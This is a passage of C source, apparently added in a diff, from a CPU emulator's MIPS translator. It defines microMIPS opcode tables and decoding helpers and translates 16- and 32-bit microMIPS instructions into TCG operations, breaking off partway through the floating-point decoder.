+/* + * microMIPS32/microMIPS64 major opcodes + * + * 1. MIPS Architecture for Programmers Volume II-B: + * The microMIPS32 Instruction Set (Revision 3.05) + * + * Table 6.2 microMIPS32 Encoding of Major Opcode Field + * + * 2. 
MIPS Architecture For Programmers Volume II-A: + * The MIPS64 Instruction Set (Revision 3.51) + */ + +enum { + POOL32A = 0x00, + POOL16A = 0x01, + LBU16 = 0x02, + MOVE16 = 0x03, + ADDI32 = 0x04, + LBU32 = 0x05, + SB32 = 0x06, + LB32 = 0x07, + + POOL32B = 0x08, + POOL16B = 0x09, + LHU16 = 0x0a, + ANDI16 = 0x0b, + ADDIU32 = 0x0c, + LHU32 = 0x0d, + SH32 = 0x0e, + LH32 = 0x0f, + + POOL32I = 0x10, + POOL16C = 0x11, + LWSP16 = 0x12, + POOL16D = 0x13, + ORI32 = 0x14, + POOL32F = 0x15, + POOL32S = 0x16, /* MIPS64 */ + DADDIU32 = 0x17, /* MIPS64 */ + + /* 0x1f is reserved */ + POOL32C = 0x18, + LWGP16 = 0x19, + LW16 = 0x1a, + POOL16E = 0x1b, + XORI32 = 0x1c, + JALS32 = 0x1d, + ADDIUPC = 0x1e, + + /* 0x20 is reserved */ + RES_20 = 0x20, + POOL16F = 0x21, + SB16 = 0x22, + BEQZ16 = 0x23, + SLTI32 = 0x24, + BEQ32 = 0x25, + SWC132 = 0x26, + LWC132 = 0x27, + + /* 0x28 and 0x29 are reserved */ + RES_28 = 0x28, + RES_29 = 0x29, + SH16 = 0x2a, + BNEZ16 = 0x2b, + SLTIU32 = 0x2c, + BNE32 = 0x2d, + SDC132 = 0x2e, + LDC132 = 0x2f, + + /* 0x30 and 0x31 are reserved */ + RES_30 = 0x30, + RES_31 = 0x31, + SWSP16 = 0x32, + B16 = 0x33, + ANDI32 = 0x34, + J32 = 0x35, + SD32 = 0x36, /* MIPS64 */ + LD32 = 0x37, /* MIPS64 */ + + /* 0x38 and 0x39 are reserved */ + RES_38 = 0x38, + RES_39 = 0x39, + SW16 = 0x3a, + LI16 = 0x3b, + JALX32 = 0x3c, + JAL32 = 0x3d, + SW32 = 0x3e, + LW32 = 0x3f +}; + +/* POOL32A encoding of minor opcode field */ + +enum { + /* These opcodes are distinguished only by bits 9..6; those bits are + * what are recorded below. */ + SLL32 = 0x0, + SRL32 = 0x1, + SRA = 0x2, + ROTR = 0x3, + + SLLV = 0x0, + SRLV = 0x1, + SRAV = 0x2, + ROTRV = 0x3, + ADD = 0x4, + ADDU32 = 0x5, + SUB = 0x6, + SUBU32 = 0x7, + MUL = 0x8, + AND = 0x9, + OR32 = 0xa, + NOR = 0xb, + XOR32 = 0xc, + SLT = 0xd, + SLTU = 0xe, + + MOVN = 0x0, + MOVZ = 0x1, + LWXS = 0x4, + + /* The following can be distinguished by their lower 6 bits. 
*/ + INS = 0x0c, + EXT = 0x2c, + POOL32AXF = 0x3c +}; + +/* POOL32AXF encoding of minor opcode field extension */ + +/* + * 1. MIPS Architecture for Programmers Volume II-B: + * The microMIPS32 Instruction Set (Revision 3.05) + * + * Table 6.5 POOL32Axf Encoding of Minor Opcode Extension Field + * + * 2. MIPS Architecture for Programmers VolumeIV-e: + * The MIPS DSP Application-Specific Extension + * to the microMIPS32 Architecture (Revision 2.34) + * + * Table 5.5 POOL32Axf Encoding of Minor Opcode Extension Field + */ + +enum { + /* bits 11..6 */ + TEQ = 0x00, + TGE = 0x08, + TGEU = 0x10, + TLT = 0x20, + TLTU = 0x28, + TNE = 0x30, + + MFC0 = 0x03, + MTC0 = 0x0b, + + /* begin of microMIPS32 DSP */ + + /* bits 13..12 for 0x01 */ + MFHI_ACC = 0x0, + MFLO_ACC = 0x1, + MTHI_ACC = 0x2, + MTLO_ACC = 0x3, + + /* bits 13..12 for 0x2a */ + MADD_ACC = 0x0, + MADDU_ACC = 0x1, + MSUB_ACC = 0x2, + MSUBU_ACC = 0x3, + + /* bits 13..12 for 0x32 */ + MULT_ACC = 0x0, + MULTU_ACC = 0x1, + + /* end of microMIPS32 DSP */ + + /* bits 15..12 for 0x2c */ + SEB = 0x2, + SEH = 0x3, + CLO = 0x4, + CLZ = 0x5, + RDHWR = 0x6, + WSBH = 0x7, + MULT = 0x8, + MULTU = 0x9, + DIV = 0xa, + DIVU = 0xb, + MADD = 0xc, + MADDU = 0xd, + MSUB = 0xe, + MSUBU = 0xf, + + /* bits 15..12 for 0x34 */ + MFC2 = 0x4, + MTC2 = 0x5, + MFHC2 = 0x8, + MTHC2 = 0x9, + CFC2 = 0xc, + CTC2 = 0xd, + + /* bits 15..12 for 0x3c */ + JALR = 0x0, + JR = 0x0, /* alias */ + JALR_HB = 0x1, + JALRS = 0x4, + JALRS_HB = 0x5, + + /* bits 15..12 for 0x05 */ + RDPGPR = 0xe, + WRPGPR = 0xf, + + /* bits 15..12 for 0x0d */ + TLBP = 0x0, + TLBR = 0x1, + TLBWI = 0x2, + TLBWR = 0x3, + WAIT = 0x9, + IRET = 0xd, + DERET = 0xe, + ERET = 0xf, + + /* bits 15..12 for 0x15 */ + DMT = 0x0, + DVPE = 0x1, + EMT = 0x2, + EVPE = 0x3, + + /* bits 15..12 for 0x1d */ + DI = 0x4, + EI = 0x5, + + /* bits 15..12 for 0x2d */ + SYNC = 0x6, + SYSCALL = 0x8, + SDBBP = 0xd, + + /* bits 15..12 for 0x35 */ + MFHI32 = 0x0, + MFLO32 = 0x1, + MTHI32 = 0x2, + MTLO32 = 0x3, 
+}; + +/* POOL32B encoding of minor opcode field (bits 15..12) */ + +enum { + LWC2 = 0x0, + LWP = 0x1, + LDP = 0x4, + LWM32 = 0x5, + CACHE = 0x6, + LDM = 0x7, + SWC2 = 0x8, + SWP = 0x9, + SDP = 0xc, + SWM32 = 0xd, + SDM = 0xf +}; + +/* POOL32C encoding of minor opcode field (bits 15..12) */ + +enum { + LWL = 0x0, + SWL = 0x8, + LWR = 0x1, + SWR = 0x9, + PREF = 0x2, + /* 0xa is reserved */ + LL = 0x3, + SC = 0xb, + LDL = 0x4, + SDL = 0xc, + LDR = 0x5, + SDR = 0xd, + /* 0x6 is reserved */ + LWU = 0xe, + LLD = 0x7, + SCD = 0xf +}; + +/* POOL32F encoding of minor opcode field (bits 5..0) */ + +enum { + /* These are the bit 7..6 values */ + ADD_FMT = 0x0, + MOVN_FMT = 0x0, + + SUB_FMT = 0x1, + MOVZ_FMT = 0x1, + + MUL_FMT = 0x2, + + DIV_FMT = 0x3, + + /* These are the bit 8..6 values */ + RSQRT2_FMT = 0x0, + MOVF_FMT = 0x0, + + LWXC1 = 0x1, + MOVT_FMT = 0x1, + + PLL_PS = 0x2, + SWXC1 = 0x2, + + PLU_PS = 0x3, + LDXC1 = 0x3, + + PUL_PS = 0x4, + SDXC1 = 0x4, + RECIP2_FMT = 0x4, + + PUU_PS = 0x5, + LUXC1 = 0x5, + + CVT_PS_S = 0x6, + SUXC1 = 0x6, + ADDR_PS = 0x6, + PREFX = 0x6, + + MULR_PS = 0x7, + + MADD_S = 0x01, + MADD_D = 0x09, + MADD_PS = 0x11, + ALNV_PS = 0x19, + MSUB_S = 0x21, + MSUB_D = 0x29, + MSUB_PS = 0x31, + + NMADD_S = 0x02, + NMADD_D = 0x0a, + NMADD_PS = 0x12, + NMSUB_S = 0x22, + NMSUB_D = 0x2a, + NMSUB_PS = 0x32, + + POOL32FXF = 0x3b, + + CABS_COND_FMT = 0x1c, /* MIPS3D */ + C_COND_FMT = 0x3c +}; + +/* POOL32Fxf encoding of minor opcode extension field */ + +enum { + CVT_L = 0x04, + RSQRT_FMT = 0x08, + FLOOR_L = 0x0c, + CVT_PW_PS = 0x1c, + CVT_W = 0x24, + SQRT_FMT = 0x28, + FLOOR_W = 0x2c, + CVT_PS_PW = 0x3c, + CFC1 = 0x40, + RECIP_FMT = 0x48, + CEIL_L = 0x4c, + CTC1 = 0x60, + CEIL_W = 0x6c, + MFC1 = 0x80, + CVT_S_PL = 0x84, + TRUNC_L = 0x8c, + MTC1 = 0xa0, + CVT_S_PU = 0xa4, + TRUNC_W = 0xac, + MFHC1 = 0xc0, + ROUND_L = 0xcc, + MTHC1 = 0xe0, + ROUND_W = 0xec, + + MOV_FMT = 0x01, + MOVF = 0x05, + ABS_FMT = 0x0d, + RSQRT1_FMT = 0x1d, + MOVT = 0x25, + NEG_FMT = 
0x2d, + CVT_D = 0x4d, + RECIP1_FMT = 0x5d, + CVT_S = 0x6d +}; + +/* POOL32I encoding of minor opcode field (bits 25..21) */ + +enum { + BLTZ = 0x00, + BLTZAL = 0x01, + BGEZ = 0x02, + BGEZAL = 0x03, + BLEZ = 0x04, + BNEZC = 0x05, + BGTZ = 0x06, + BEQZC = 0x07, + TLTI = 0x08, + TGEI = 0x09, + TLTIU = 0x0a, + TGEIU = 0x0b, + TNEI = 0x0c, + LUI = 0x0d, + TEQI = 0x0e, + SYNCI = 0x10, + BLTZALS = 0x11, + BGEZALS = 0x13, + BC2F = 0x14, + BC2T = 0x15, + BPOSGE64 = 0x1a, + BPOSGE32 = 0x1b, + /* These overlap and are distinguished by bit16 of the instruction */ + BC1F = 0x1c, + BC1T = 0x1d, + BC1ANY2F = 0x1c, + BC1ANY2T = 0x1d, + BC1ANY4F = 0x1e, + BC1ANY4T = 0x1f +}; + +/* POOL16A encoding of minor opcode field */ + +enum { + ADDU16 = 0x0, + SUBU16 = 0x1 +}; + +/* POOL16B encoding of minor opcode field */ + +enum { + SLL16 = 0x0, + SRL16 = 0x1 +}; + +/* POOL16C encoding of minor opcode field */ + +enum { + NOT16 = 0x00, + XOR16 = 0x04, + AND16 = 0x08, + OR16 = 0x0c, + LWM16 = 0x10, + SWM16 = 0x14, + JR16 = 0x18, + JRC16 = 0x1a, + JALR16 = 0x1c, + JALR16S = 0x1e, + MFHI16 = 0x20, + MFLO16 = 0x24, + BREAK16 = 0x28, + SDBBP16 = 0x2c, + JRADDIUSP = 0x30 +}; + +/* POOL16D encoding of minor opcode field */ + +enum { + ADDIUS5 = 0x0, + ADDIUSP = 0x1 +}; + +/* POOL16E encoding of minor opcode field */ + +enum { + ADDIUR2 = 0x0, + ADDIUR1SP = 0x1 +}; + +static int mmreg (int r) +{ + static const int map[] = { 16, 17, 2, 3, 4, 5, 6, 7 }; + + return map[r]; +} + +/* Used for 16-bit store instructions. 
*/ +static int mmreg2 (int r) +{ + static const int map[] = { 0, 17, 2, 3, 4, 5, 6, 7 }; + + return map[r]; +} + +#define uMIPS_RD(op) ((op >> 7) & 0x7) +#define uMIPS_RS(op) ((op >> 4) & 0x7) +#define uMIPS_RS2(op) uMIPS_RS(op) +#define uMIPS_RS1(op) ((op >> 1) & 0x7) +#define uMIPS_RD5(op) ((op >> 5) & 0x1f) +#define uMIPS_RS5(op) (op & 0x1f) + +/* Signed immediate */ +#define SIMM(op, start, width) \ + ((int32_t)(((op >> start) & ((~0U) >> (32-width))) \ + << (32-width)) \ + >> (32-width)) +/* Zero-extended immediate */ +#define ZIMM(op, start, width) ((op >> start) & ((~0U) >> (32-width))) + +static void gen_addiur1sp(DisasContext *ctx) +{ + int rd = mmreg(uMIPS_RD(ctx->opcode)); + + gen_arith_imm(ctx, OPC_ADDIU, rd, 29, ((ctx->opcode >> 1) & 0x3f) << 2); +} + +static void gen_addiur2(DisasContext *ctx) +{ + static const int decoded_imm[] = { 1, 4, 8, 12, 16, 20, 24, -1 }; + int rd = mmreg(uMIPS_RD(ctx->opcode)); + int rs = mmreg(uMIPS_RS(ctx->opcode)); + + gen_arith_imm(ctx, OPC_ADDIU, rd, rs, decoded_imm[ZIMM(ctx->opcode, 1, 3)]); +} + +static void gen_addiusp(DisasContext *ctx) +{ + int encoded = ZIMM(ctx->opcode, 1, 9); + int decoded; + + if (encoded <= 1) { + decoded = 256 + encoded; + } else if (encoded <= 255) { + decoded = encoded; + } else if (encoded <= 509) { + decoded = encoded - 512; + } else { + decoded = encoded - 768; + } + + gen_arith_imm(ctx, OPC_ADDIU, 29, 29, decoded << 2); +} + +static void gen_addius5(DisasContext *ctx) +{ + int imm = SIMM(ctx->opcode, 1, 4); + int rd = (ctx->opcode >> 5) & 0x1f; + + gen_arith_imm(ctx, OPC_ADDIU, rd, rd, imm); +} + +static void gen_andi16(DisasContext *ctx) +{ + static const int decoded_imm[] = { 128, 1, 2, 3, 4, 7, 8, 15, 16, + 31, 32, 63, 64, 255, 32768, 65535 }; + int rd = mmreg(uMIPS_RD(ctx->opcode)); + int rs = mmreg(uMIPS_RS(ctx->opcode)); + int encoded = ZIMM(ctx->opcode, 0, 4); + + gen_logic_imm(ctx, OPC_ANDI, rd, rs, decoded_imm[encoded]); +} + +static void gen_ldst_multiple (DisasContext *ctx, 
uint32_t opc, int reglist, + int base, int16_t offset) +{ + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + const char *opn = "ldst_multiple"; + TCGv t0, t1; + TCGv_i32 t2; + + if (ctx->hflags & MIPS_HFLAG_BMASK) { + generate_exception(ctx, EXCP_RI); + return; + } + + t0 = tcg_temp_new(tcg_ctx); + + gen_base_offset_addr(ctx, t0, base, offset); + + t1 = tcg_const_tl(tcg_ctx, reglist); + t2 = tcg_const_i32(tcg_ctx, ctx->mem_idx); + + save_cpu_state(ctx, 1); + switch (opc) { + case LWM32: + gen_helper_lwm(tcg_ctx, tcg_ctx->cpu_env, t0, t1, t2); + opn = "lwm"; + break; + case SWM32: + gen_helper_swm(tcg_ctx, tcg_ctx->cpu_env, t0, t1, t2); + opn = "swm"; + break; +#ifdef TARGET_MIPS64 + case LDM: + gen_helper_ldm(tcg_ctx, tcg_ctx->cpu_env, t0, t1, t2); + opn = "ldm"; + break; + case SDM: + gen_helper_sdm(tcg_ctx, tcg_ctx->cpu_env, t0, t1, t2); + opn = "sdm"; + break; +#endif + } + (void)opn; + MIPS_DEBUG("%s, %x, %d(%s)", opn, reglist, offset, regnames[base]); + tcg_temp_free(tcg_ctx, t0); + tcg_temp_free(tcg_ctx, t1); + tcg_temp_free_i32(tcg_ctx, t2); +} + + +static void gen_pool16c_insn(DisasContext *ctx) +{ + int rd = mmreg((ctx->opcode >> 3) & 0x7); + int rs = mmreg(ctx->opcode & 0x7); + + switch (((ctx->opcode) >> 4) & 0x3f) { + case NOT16 + 0: + case NOT16 + 1: + case NOT16 + 2: + case NOT16 + 3: + gen_logic(ctx, OPC_NOR, rd, rs, 0); + break; + case XOR16 + 0: + case XOR16 + 1: + case XOR16 + 2: + case XOR16 + 3: + gen_logic(ctx, OPC_XOR, rd, rd, rs); + break; + case AND16 + 0: + case AND16 + 1: + case AND16 + 2: + case AND16 + 3: + gen_logic(ctx, OPC_AND, rd, rd, rs); + break; + case OR16 + 0: + case OR16 + 1: + case OR16 + 2: + case OR16 + 3: + gen_logic(ctx, OPC_OR, rd, rd, rs); + break; + case LWM16 + 0: + case LWM16 + 1: + case LWM16 + 2: + case LWM16 + 3: + { + static const int lwm_convert[] = { 0x11, 0x12, 0x13, 0x14 }; + int offset = ZIMM(ctx->opcode, 0, 4); + + gen_ldst_multiple(ctx, LWM32, lwm_convert[(ctx->opcode >> 4) & 0x3], + 29, offset << 2); + } + break; 
+ case SWM16 + 0: + case SWM16 + 1: + case SWM16 + 2: + case SWM16 + 3: + { + static const int swm_convert[] = { 0x11, 0x12, 0x13, 0x14 }; + int offset = ZIMM(ctx->opcode, 0, 4); + + gen_ldst_multiple(ctx, SWM32, swm_convert[(ctx->opcode >> 4) & 0x3], + 29, offset << 2); + } + break; + case JR16 + 0: + case JR16 + 1: + { + int reg = ctx->opcode & 0x1f; + + gen_compute_branch(ctx, OPC_JR, 2, reg, 0, 0, 4); + } + break; + case JRC16 + 0: + case JRC16 + 1: + { + int reg = ctx->opcode & 0x1f; + gen_compute_branch(ctx, OPC_JR, 2, reg, 0, 0, 0); + /* Let normal delay slot handling in our caller take us + to the branch target. */ + } + break; + case JALR16 + 0: + case JALR16 + 1: + gen_compute_branch(ctx, OPC_JALR, 2, ctx->opcode & 0x1f, 31, 0, 4); + ctx->hflags |= MIPS_HFLAG_BDS_STRICT; + break; + case JALR16S + 0: + case JALR16S + 1: + gen_compute_branch(ctx, OPC_JALR, 2, ctx->opcode & 0x1f, 31, 0, 2); + ctx->hflags |= MIPS_HFLAG_BDS_STRICT; + break; + case MFHI16 + 0: + case MFHI16 + 1: + gen_HILO(ctx, OPC_MFHI, 0, uMIPS_RS5(ctx->opcode)); + break; + case MFLO16 + 0: + case MFLO16 + 1: + gen_HILO(ctx, OPC_MFLO, 0, uMIPS_RS5(ctx->opcode)); + break; + case BREAK16: + generate_exception(ctx, EXCP_BREAK); + break; + case SDBBP16: + /* XXX: not clear which exception should be raised + * when in debug mode... + */ + check_insn(ctx, ISA_MIPS32); + if (!(ctx->hflags & MIPS_HFLAG_DM)) { + generate_exception(ctx, EXCP_DBp); + } else { + generate_exception(ctx, EXCP_DBp); + } + break; + case JRADDIUSP + 0: + case JRADDIUSP + 1: + { + int imm = ZIMM(ctx->opcode, 0, 5); + gen_compute_branch(ctx, OPC_JR, 2, 31, 0, 0, 0); + gen_arith_imm(ctx, OPC_ADDIU, 29, 29, imm << 2); + /* Let normal delay slot handling in our caller take us + to the branch target. 
*/ + } + break; + default: + generate_exception(ctx, EXCP_RI); + break; + } +} + +static void gen_ldxs (DisasContext *ctx, int base, int index, int rd) +{ + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + TCGv t0 = tcg_temp_new(tcg_ctx); + TCGv t1 = tcg_temp_new(tcg_ctx); + + gen_load_gpr(ctx, t0, base); + + if (index != 0) { + gen_load_gpr(ctx, t1, index); + tcg_gen_shli_tl(tcg_ctx, t1, t1, 2); + gen_op_addr_add(ctx, t0, t1, t0); + } + + tcg_gen_qemu_ld_tl(ctx->uc, t1, t0, ctx->mem_idx, MO_TESL); + gen_store_gpr(tcg_ctx, t1, rd); + + tcg_temp_free(tcg_ctx, t0); + tcg_temp_free(tcg_ctx, t1); +} + +static void gen_ldst_pair (DisasContext *ctx, uint32_t opc, int rd, + int base, int16_t offset) +{ + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + const char *opn = "ldst_pair"; + TCGv t0, t1; + + if (ctx->hflags & MIPS_HFLAG_BMASK || rd == 31) { + generate_exception(ctx, EXCP_RI); + return; + } + + t0 = tcg_temp_new(tcg_ctx); + t1 = tcg_temp_new(tcg_ctx); + + gen_base_offset_addr(ctx, t0, base, offset); + + switch (opc) { + case LWP: + if (rd == base) { + generate_exception(ctx, EXCP_RI); + return; + } + tcg_gen_qemu_ld_tl(ctx->uc, t1, t0, ctx->mem_idx, MO_TESL); + gen_store_gpr(tcg_ctx, t1, rd); + tcg_gen_movi_tl(tcg_ctx, t1, 4); + gen_op_addr_add(ctx, t0, t0, t1); + tcg_gen_qemu_ld_tl(ctx->uc, t1, t0, ctx->mem_idx, MO_TESL); + gen_store_gpr(tcg_ctx, t1, rd+1); + opn = "lwp"; + break; + case SWP: + gen_load_gpr(ctx, t1, rd); + tcg_gen_qemu_st_tl(ctx->uc, t1, t0, ctx->mem_idx, MO_TEUL); + tcg_gen_movi_tl(tcg_ctx, t1, 4); + gen_op_addr_add(ctx, t0, t0, t1); + gen_load_gpr(ctx, t1, rd+1); + tcg_gen_qemu_st_tl(ctx->uc, t1, t0, ctx->mem_idx, MO_TEUL); + opn = "swp"; + break; +#ifdef TARGET_MIPS64 + case LDP: + if (rd == base) { + generate_exception(ctx, EXCP_RI); + return; + } + tcg_gen_qemu_ld_tl(ctx->uc, t1, t0, ctx->mem_idx, MO_TEQ); + gen_store_gpr(tcg_ctx, t1, rd); + tcg_gen_movi_tl(tcg_ctx, t1, 8); + gen_op_addr_add(ctx, t0, t0, t1); + tcg_gen_qemu_ld_tl(ctx->uc, t1, t0, 
ctx->mem_idx, MO_TEQ); + gen_store_gpr(tcg_ctx, t1, rd+1); + opn = "ldp"; + break; + case SDP: + gen_load_gpr(ctx, t1, rd); + tcg_gen_qemu_st_tl(ctx->uc, t1, t0, ctx->mem_idx, MO_TEQ); + tcg_gen_movi_tl(tcg_ctx, t1, 8); + gen_op_addr_add(ctx, t0, t0, t1); + gen_load_gpr(ctx, t1, rd+1); + tcg_gen_qemu_st_tl(ctx->uc, t1, t0, ctx->mem_idx, MO_TEQ); + opn = "sdp"; + break; +#endif + } + (void)opn; /* avoid a compiler warning */ + MIPS_DEBUG("%s, %s, %d(%s)", opn, regnames[rd], offset, regnames[base]); + tcg_temp_free(tcg_ctx, t0); + tcg_temp_free(tcg_ctx, t1); +} + +static void gen_pool32axf (CPUMIPSState *env, DisasContext *ctx, int rt, int rs) +{ + TCGContext *tcg_ctx = env->uc->tcg_ctx; + TCGv **cpu_gpr = (TCGv **)tcg_ctx->cpu_gpr; + int extension = (ctx->opcode >> 6) & 0x3f; + int minor = (ctx->opcode >> 12) & 0xf; + uint32_t mips32_op; + + switch (extension) { + case TEQ: + mips32_op = OPC_TEQ; + goto do_trap; + case TGE: + mips32_op = OPC_TGE; + goto do_trap; + case TGEU: + mips32_op = OPC_TGEU; + goto do_trap; + case TLT: + mips32_op = OPC_TLT; + goto do_trap; + case TLTU: + mips32_op = OPC_TLTU; + goto do_trap; + case TNE: + mips32_op = OPC_TNE; + do_trap: + gen_trap(ctx, mips32_op, rs, rt, -1); + break; +#ifndef CONFIG_USER_ONLY + case MFC0: + case MFC0 + 32: + check_cp0_enabled(ctx); + if (rt == 0) { + /* Treat as NOP. 
*/ + break; + } + gen_mfc0(ctx, *cpu_gpr[rt], rs, (ctx->opcode >> 11) & 0x7); + break; + case MTC0: + case MTC0 + 32: + check_cp0_enabled(ctx); + { + TCGv t0 = tcg_temp_new(tcg_ctx); + + gen_load_gpr(ctx, t0, rt); + gen_mtc0(ctx, t0, rs, (ctx->opcode >> 11) & 0x7); + tcg_temp_free(tcg_ctx, t0); + } + break; +#endif + case 0x2a: + switch (minor & 3) { + case MADD_ACC: + gen_muldiv(ctx, OPC_MADD, (ctx->opcode >> 14) & 3, rs, rt); + break; + case MADDU_ACC: + gen_muldiv(ctx, OPC_MADDU, (ctx->opcode >> 14) & 3, rs, rt); + break; + case MSUB_ACC: + gen_muldiv(ctx, OPC_MSUB, (ctx->opcode >> 14) & 3, rs, rt); + break; + case MSUBU_ACC: + gen_muldiv(ctx, OPC_MSUBU, (ctx->opcode >> 14) & 3, rs, rt); + break; + default: + goto pool32axf_invalid; + } + break; + case 0x32: + switch (minor & 3) { + case MULT_ACC: + gen_muldiv(ctx, OPC_MULT, (ctx->opcode >> 14) & 3, rs, rt); + break; + case MULTU_ACC: + gen_muldiv(ctx, OPC_MULTU, (ctx->opcode >> 14) & 3, rs, rt); + break; + default: + goto pool32axf_invalid; + } + break; + case 0x2c: + switch (minor) { + case SEB: + gen_bshfl(ctx, OPC_SEB, rs, rt); + break; + case SEH: + gen_bshfl(ctx, OPC_SEH, rs, rt); + break; + case CLO: + mips32_op = OPC_CLO; + goto do_cl; + case CLZ: + mips32_op = OPC_CLZ; + do_cl: + check_insn(ctx, ISA_MIPS32); + gen_cl(ctx, mips32_op, rt, rs); + break; + case RDHWR: + gen_rdhwr(ctx, rt, rs); + break; + case WSBH: + gen_bshfl(ctx, OPC_WSBH, rs, rt); + break; + case MULT: + mips32_op = OPC_MULT; + goto do_mul; + case MULTU: + mips32_op = OPC_MULTU; + goto do_mul; + case DIV: + mips32_op = OPC_DIV; + goto do_div; + case DIVU: + mips32_op = OPC_DIVU; + goto do_div; + do_div: + check_insn(ctx, ISA_MIPS32); + gen_muldiv(ctx, mips32_op, 0, rs, rt); + break; + case MADD: + mips32_op = OPC_MADD; + goto do_mul; + case MADDU: + mips32_op = OPC_MADDU; + goto do_mul; + case MSUB: + mips32_op = OPC_MSUB; + goto do_mul; + case MSUBU: + mips32_op = OPC_MSUBU; + do_mul: + check_insn(ctx, ISA_MIPS32); + gen_muldiv(ctx, 
mips32_op, 0, rs, rt); + break; + default: + goto pool32axf_invalid; + } + break; + case 0x34: + switch (minor) { + case MFC2: + case MTC2: + case MFHC2: + case MTHC2: + case CFC2: + case CTC2: + generate_exception_err(ctx, EXCP_CpU, 2); + break; + default: + goto pool32axf_invalid; + } + break; + case 0x3c: + switch (minor) { + case JALR: + case JALR_HB: + gen_compute_branch(ctx, OPC_JALR, 4, rs, rt, 0, 4); + ctx->hflags |= MIPS_HFLAG_BDS_STRICT; + break; + case JALRS: + case JALRS_HB: + gen_compute_branch(ctx, OPC_JALR, 4, rs, rt, 0, 2); + ctx->hflags |= MIPS_HFLAG_BDS_STRICT; + break; + default: + goto pool32axf_invalid; + } + break; + case 0x05: + switch (minor) { + case RDPGPR: + check_cp0_enabled(ctx); + check_insn(ctx, ISA_MIPS32R2); + gen_load_srsgpr(ctx, rt, rs); + break; + case WRPGPR: + check_cp0_enabled(ctx); + check_insn(ctx, ISA_MIPS32R2); + gen_store_srsgpr(ctx, rt, rs); + break; + default: + goto pool32axf_invalid; + } + break; +#ifndef CONFIG_USER_ONLY + case 0x0d: + switch (minor) { + case TLBP: + mips32_op = OPC_TLBP; + goto do_cp0; + case TLBR: + mips32_op = OPC_TLBR; + goto do_cp0; + case TLBWI: + mips32_op = OPC_TLBWI; + goto do_cp0; + case TLBWR: + mips32_op = OPC_TLBWR; + goto do_cp0; + case WAIT: + mips32_op = OPC_WAIT; + goto do_cp0; + case DERET: + mips32_op = OPC_DERET; + goto do_cp0; + case ERET: + mips32_op = OPC_ERET; + do_cp0: + gen_cp0(env, ctx, mips32_op, rt, rs); + break; + default: + goto pool32axf_invalid; + } + break; + case 0x1d: + switch (minor) { + case DI: + check_cp0_enabled(ctx); + { + TCGv t0 = tcg_temp_new(tcg_ctx); + + save_cpu_state(ctx, 1); + gen_helper_di(tcg_ctx, t0, tcg_ctx->cpu_env); + gen_store_gpr(tcg_ctx, t0, rs); + /* Stop translation as we may have switched the execution mode */ + ctx->bstate = BS_STOP; + tcg_temp_free(tcg_ctx, t0); + } + break; + case EI: + check_cp0_enabled(ctx); + { + TCGv t0 = tcg_temp_new(tcg_ctx); + + save_cpu_state(ctx, 1); + gen_helper_ei(tcg_ctx, t0, tcg_ctx->cpu_env); + 
gen_store_gpr(tcg_ctx, t0, rs); + /* Stop translation as we may have switched the execution mode */ + ctx->bstate = BS_STOP; + tcg_temp_free(tcg_ctx, t0); + } + break; + default: + goto pool32axf_invalid; + } + break; +#endif + case 0x2d: + switch (minor) { + case SYNC: + /* NOP */ + break; + case SYSCALL: + generate_exception(ctx, EXCP_SYSCALL); + ctx->bstate = BS_STOP; + break; + case SDBBP: + check_insn(ctx, ISA_MIPS32); + if (!(ctx->hflags & MIPS_HFLAG_DM)) { + generate_exception(ctx, EXCP_DBp); + } else { + generate_exception(ctx, EXCP_DBp); + } + break; + default: + goto pool32axf_invalid; + } + break; + case 0x01: + switch (minor & 3) { + case MFHI_ACC: + gen_HILO(ctx, OPC_MFHI, minor >> 2, rs); + break; + case MFLO_ACC: + gen_HILO(ctx, OPC_MFLO, minor >> 2, rs); + break; + case MTHI_ACC: + gen_HILO(ctx, OPC_MTHI, minor >> 2, rs); + break; + case MTLO_ACC: + gen_HILO(ctx, OPC_MTLO, minor >> 2, rs); + break; + default: + goto pool32axf_invalid; + } + break; + case 0x35: + switch (minor) { + case MFHI32: + gen_HILO(ctx, OPC_MFHI, 0, rs); + break; + case MFLO32: + gen_HILO(ctx, OPC_MFLO, 0, rs); + break; + case MTHI32: + gen_HILO(ctx, OPC_MTHI, 0, rs); + break; + case MTLO32: + gen_HILO(ctx, OPC_MTLO, 0, rs); + break; + default: + goto pool32axf_invalid; + } + break; + default: + pool32axf_invalid: + MIPS_INVAL("pool32axf"); + generate_exception(ctx, EXCP_RI); + break; + } +} + +/* Values for microMIPS fmt field. Variable-width, depending on which + formats the instruction supports. 
*/ + +enum { + FMT_SD_S = 0, + FMT_SD_D = 1, + + FMT_SDPS_S = 0, + FMT_SDPS_D = 1, + FMT_SDPS_PS = 2, + + FMT_SWL_S = 0, + FMT_SWL_W = 1, + FMT_SWL_L = 2, + + FMT_DWL_D = 0, + FMT_DWL_W = 1, + FMT_DWL_L = 2 +}; + +static void gen_pool32fxf(DisasContext *ctx, int rt, int rs) +{ + int extension = (ctx->opcode >> 6) & 0x3ff; + uint32_t mips32_op; + +#define FLOAT_1BIT_FMT(opc, fmt) (fmt << 8) | opc +#define FLOAT_2BIT_FMT(opc, fmt) (fmt << 7) | opc +#define COND_FLOAT_MOV(opc, cond) (cond << 7) | opc + + switch (extension) { + case FLOAT_1BIT_FMT(CFC1, 0): + mips32_op = OPC_CFC1; + goto do_cp1; + case FLOAT_1BIT_FMT(CTC1, 0): + mips32_op = OPC_CTC1; + goto do_cp1; + case FLOAT_1BIT_FMT(MFC1, 0): + mips32_op = OPC_MFC1; + goto do_cp1; + case FLOAT_1BIT_FMT(MTC1, 0): + mips32_op = OPC_MTC1; + goto do_cp1; + case FLOAT_1BIT_FMT(MFHC1, 0): + mips32_op = OPC_MFHC1; + goto do_cp1; + case FLOAT_1BIT_FMT(MTHC1, 0): + mips32_op = OPC_MTHC1; + do_cp1: + gen_cp1(ctx, mips32_op, rt, rs); + break; + + /* Reciprocal square root */ + case FLOAT_1BIT_FMT(RSQRT_FMT, FMT_SD_S): + mips32_op = OPC_RSQRT_S; + goto do_unaryfp; + case FLOAT_1BIT_FMT(RSQRT_FMT, FMT_SD_D): + mips32_op = OPC_RSQRT_D; + goto do_unaryfp; + + /* Square root */ + case FLOAT_1BIT_FMT(SQRT_FMT, FMT_SD_S): + mips32_op = OPC_SQRT_S; + goto do_unaryfp; + case FLOAT_1BIT_FMT(SQRT_FMT, FMT_SD_D): + mips32_op = OPC_SQRT_D; + goto do_unaryfp; + + /* Reciprocal */ + case 